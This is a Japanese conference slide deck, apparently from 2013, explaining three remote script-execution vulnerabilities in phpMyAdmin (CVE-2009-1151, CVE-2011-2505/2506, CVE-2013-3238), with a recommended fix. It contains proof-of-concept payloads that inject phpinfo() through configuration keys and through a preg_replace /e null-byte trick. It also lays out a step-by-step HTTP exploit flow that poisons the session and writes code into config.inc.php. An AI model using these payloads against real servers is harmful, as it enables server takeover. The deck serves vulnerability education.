phpMyAdminにおけるスクリプト実行可能な脆弱性3種盛り合わせ
15 likes10,414 views
phpMyAdminのスクリプト実行可能な脆弱性を3種類集めました
![configurationからPHPソースが作られる
Copyright © 2013 HASH Consulting Corp.
9
Array (
[Servers] => Array (
[0] => Array (
[host] => localhost
[extension] => mysql
[connect_type] => tcp
[compress] =>
[auth_type] => config
[user] => root
)
)
)
configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"host";s:9:"localhost
";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"comp
ress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}}
$i++;
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysql';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-9-320.jpg)
![値に「’」を入れると、ちゃんとエスケープされる
Copyright © 2013 HASH Consulting Corp.
10
Array (
[Servers] => Array (
[0] => Array (
[host] => localhost'a
[extension] => mysql
[connect_type] => tcp
[compress] =>
[auth_type] => config
[user] => root
)
)
)
configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"host";s:11:"localho
st'a";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"c
ompress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}}
$i++;
$cfg['Servers'][$i]['host'] = 'localhost¥'a';
$cfg['Servers'][$i]['extension'] = 'mysql';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-10-320.jpg)
![でも、キー側の「’」はエスケープされない ^^;
Copyright © 2013 HASH Consulting Corp.
11
Array (
[Servers] => Array (
[0] => Array (
[host'a] => localhost
[extension] => mysql
[connect_type] => tcp
[compress] =>
[auth_type] => config
[user] => root
)
)
)
configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:6:"host'a";s:9:"localho
st";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"co
mpress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}}
$i++;
$cfg['Servers'][$i]['host'a'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysql';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-11-320.jpg)
![キーにスクリプトを注入可能
Copyright © 2013 HASH Consulting Corp.
12
Array (
[Servers] => Array (
[0] => Array (
[host'']=phpinfo();//] => localhost
[extension] => mysql
[connect_type] => tcp
[compress] =>
[auth_type] => config
[user] => root
)
)
)
configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:19:"host']=phpinfo();//";s:9:
"localhost";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"
compress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}}
$i++;
$cfg['Servers'][$i]['host’]=phpinfo();//'] = 'localhost';
$cfg['Servers'][$i]['extension'] = 'mysql';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['compress'] = false;
$cfg['Servers'][$i]['auth_type'] = 'config';
$cfg['Servers'][$i]['user'] = 'root';](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-12-320.jpg)
![CVE-2011-2505
• 細工をしたクエリ文字列を通して、セッション変数
を変更できる
Copyright © 2013 HASH Consulting Corp.
15
if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false)
{
parse_str($_SERVER['QUERY_STRING']);
session_write_close();
session_id($session_to_unset); // セッションIDの変更
session_start();
$_SESSION = array();
session_write_close();
session_destroy();
exit;
}
libraries/auth/swekey/swekey.auth.lib.php 266行目以降](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-15-320.jpg)
![parse_str 関数の実行例
Copyright © 2013 HASH Consulting Corp.
17
<?php
session_start();
parse_str('a=xyz&b[x]=p23&_SESSION[user]=yamada');
var_dump($a);
var_dump($b);
var_dump($_SESSION);
【実行結果】
string(3) "xyz"
array(1) {
["x"]=>
string(3) "p23"
}
array(1) {
["user"]=>
string(6) "yamada"
}](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-17-320.jpg)
![• サーバー名(getServerName())は、コメント記号
をサニタイジングしている
• $idの方はサニタイジングしていない → 脆弱性
• CVE-2011-2505により、$idに攻撃コードが注
入できる
Copyright © 2013 HASH Consulting Corp.
19
// servers
if ($cf->getServerCount() > 0) {
$ret .= "/* Servers configuration */$crlf¥$i = 0;" . $crlf . $crlf;
foreach ($c['Servers'] as $id => $server) {
$ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . " [$id] */" . $crlf
setup/lib/ConfigGenerator.class.php 38行目](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-19-320.jpg)
![exploitの流れ
Copyright © 2013 HASH Consulting Corp.
20
セッションID、トークンの取得など
GET /phpmyadmin/setup/index.php
セッション変数汚染
GET /phpmyadmin/?_SESSION[ConfigFile][Servers][*/攻撃スクリプト
攻撃コードの埋め込み(ファイルへの保存)
POST /phpmyadmin/setup/config.php
攻撃コードの実行
GET /phpmyadmin/config/config.inc.php?eval=攻撃コード](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-20-320.jpg)
![攻撃ができる理由
Copyright © 2013 HASH Consulting Corp.
26
case 'replace_prefix_tbl':
$current = $selected[$i];
$newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current);
preg_replace("/^/e¥0/", "phpinfo();", "test");
preg_replace("/^/e", "phpinfo();", "test");
$from_pref = "/e¥0"
PHP5.4.3以前では、¥0以降は無視される](https://image.slidesharecdn.com/phpmyadmin-130731070236-phpapp01/85/phpMyAdmin-3-26-320.jpg)
phpMyAdminにおけるスクリプト実行可能な脆弱性3種盛り合わせ
- 2. アジェンダ • 今日はphpMyAdminにおける「スクリプト実行可能な脆 弱性」を3種類紹介します – CVE-2009-1151 – CVE-2011-2505 / CVE-2011-2506 – CVE-2013-3238 • まとめ 2 Copyright © 2013 HASH Consulting Corp.
- 3. はじめに • (サーバーサイド)スクリプト実行可能な脆弱性と いうと… • OSコマンドインジェクション • evalインジェクション • Local File Inclusion (LFI) / Remote File Inclusion(RFI) • スクリプトファイルのアップロード • … • 今回紹介するものはどれでもない Copyright © 2013 HASH Consulting Corp. 3
- 4. phpMyAdminとは… Copyright © 2013 HASH Consulting Corp. 4
- 5. CVE-2009-1151 Copyright © 2013 HASH Consulting Corp. 5
- 7. セットアップ内容のセーブ Copyright © 2013 HASH Consulting Corp. 7
- 8. configurationはシリアライズされたオブジェクト Copyright © 2013 HASH Consulting Corp. 8 configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"h ost";s:9:"localhost";s:9:"extension";s:5:"mysql";s:1 2:"connect_type";s:3:"tcp";s:8:"compress";b:0;s:9:" auth_type";s:6:"config";s:4:"user";s:4:"root";}}}
- 9. configurationからPHPソースが作られる Copyright © 2013 HASH Consulting Corp. 9 Array ( [Servers] => Array ( [0] => Array ( [host] => localhost [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"host";s:9:"localhost ";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"comp ress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
- 10. 値に「’」を入れると、ちゃんとエスケープされる Copyright © 2013 HASH Consulting Corp. 10 Array ( [Servers] => Array ( [0] => Array ( [host] => localhost'a [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:4:"host";s:11:"localho st'a";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"c ompress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host'] = 'localhost¥'a'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
- 11. でも、キー側の「’」はエスケープされない ^^; Copyright © 2013 HASH Consulting Corp. 11 Array ( [Servers] => Array ( [0] => Array ( [host'a] => localhost [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:6:"host'a";s:9:"localho st";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:"co mpress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host'a'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
- 12. キーにスクリプトを注入可能 Copyright © 2013 HASH Consulting Corp. 12 Array ( [Servers] => Array ( [0] => Array ( [host'']=phpinfo();//] => localhost [extension] => mysql [connect_type] => tcp [compress] => [auth_type] => config [user] => root ) ) ) configuration=a:1:{s:7:"Servers";a:1:{i:0;a:6:{s:19:"host']=phpinfo();//";s:9: "localhost";s:9:"extension";s:5:"mysql";s:12:"connect_type";s:3:"tcp";s:8:" compress";b:0;s:9:"auth_type";s:6:"config";s:4:"user";s:4:"root";}}} $i++; $cfg['Servers'][$i]['host’]=phpinfo();//'] = 'localhost'; $cfg['Servers'][$i]['extension'] = 'mysql'; $cfg['Servers'][$i]['connect_type'] = 'tcp'; $cfg['Servers'][$i]['compress'] = false; $cfg['Servers'][$i]['auth_type'] = 'config'; $cfg['Servers'][$i]['user'] = 'root';
- 13. あーあ、サーバー側でスクリプトが… Copyright © 2013 HASH Consulting Corp. 13
- 14. CVE-2011-2505 / CVE-2011-2506 Copyright © 2013 HASH Consulting Corp. 14
- 15. CVE-2011-2505 • 細工をしたクエリ文字列を通して、セッション変数 を変更できる Copyright © 2013 HASH Consulting Corp. 15 if (strstr($_SERVER['QUERY_STRING'],'session_to_unset') != false) { parse_str($_SERVER['QUERY_STRING']); session_write_close(); session_id($session_to_unset); // セッションIDの変更 session_start(); $_SESSION = array(); session_write_close(); session_destroy(); exit; } libraries/auth/swekey/swekey.auth.lib.php 266行目以降
- 17. parse_str 関数の実行例 Copyright © 2013 HASH Consulting Corp. 17 <?php session_start(); parse_str('a=xyz&b[x]=p23&_SESSION[user]=yamada'); var_dump($a); var_dump($b); var_dump($_SESSION); 【実行結果】 string(3) "xyz" array(1) { ["x"]=> string(3) "p23" } array(1) { ["user"]=> string(6) "yamada" }
- 19. • サーバー名(getServerName())は、コメント記号 をサニタイジングしている • $idの方はサニタイジングしていない → 脆弱性 • CVE-2011-2505により、$idに攻撃コードが注 入できる Copyright © 2013 HASH Consulting Corp. 19 // servers if ($cf->getServerCount() > 0) { $ret .= "/* Servers configuration */$crlf¥$i = 0;" . $crlf . $crlf; foreach ($c['Servers'] as $id => $server) { $ret .= '/* Server: ' . strtr($cf->getServerName($id), '*/', '-') . " [$id] */" . $crlf setup/lib/ConfigGenerator.class.php 38行目
- 20. exploitの流れ Copyright © 2013 HASH Consulting Corp. 20 セッションID、トークンの取得など GET /phpmyadmin/setup/index.php セッション変数汚染 GET /phpmyadmin/?_SESSION[ConfigFile][Servers][*/攻撃スクリプト 攻撃コードの埋め込み(ファイルへの保存) POST /phpmyadmin/setup/config.php 攻撃コードの実行 GET /phpmyadmin/config/config.inc.php?eval=攻撃コード
- 21. CVE-2013-3238 Copyright © 2013 HASH Consulting Corp. 21
- 23. テーブルの接頭辞を変更する機能 Copyright © 2013 HASH Consulting Corp. 23
- 24. /e¥0 をphpinfo()に変更する操作を実行してみる Copyright © 2013 HASH Consulting Corp. 24
- 25. Phpinfo()が実行された ^^; Copyright © 2013 HASH Consulting Corp. 25
- 26. 攻撃ができる理由 Copyright © 2013 HASH Consulting Corp. 26 case 'replace_prefix_tbl': $current = $selected[$i]; $newtablename = preg_replace("/^" . $from_prefix . "/", $to_prefix, $current); preg_replace("/^/e¥0/", "phpinfo();", "test"); preg_replace("/^/e", "phpinfo();", "test"); $from_pref = "/e¥0" PHP5.4.3以前では、¥0以降は無視される
- 29. 脆弱性が混入した要因 • preg_replaceに渡す正規表現をエスケープして いなかった – 最低限、/ をエスケープする必要がある • えーっと、preg_quoteって、マルチバイト対応 だっけ? – Shift_JIS以外では問題ない? Copyright © 2013 HASH Consulting Corp. 29 preg_replace(“/^” . $from_prefix . “/”, … ↓ reg_replace("/^" . preg_quote($from_prefix, '/') . "/", …
- 30. Copyright © 2013 HASH Consulting Corp. 30 まとめ • phpMyAdminのスクリプト実行可能な脆弱性3種 類を紹介しました • うち、2種類は比較的基本的なもの…脆弱性診 断でも見つかる? • Setup用のスクリプトが外部から叩けるという状 況がそもそもおかしい気が… – phpMyAdminが標準的な導入・運用のスタイルを提 供していない? • 脆弱性の入り方は酷いと思うけど、脆弱性って 大抵酷いものだよねw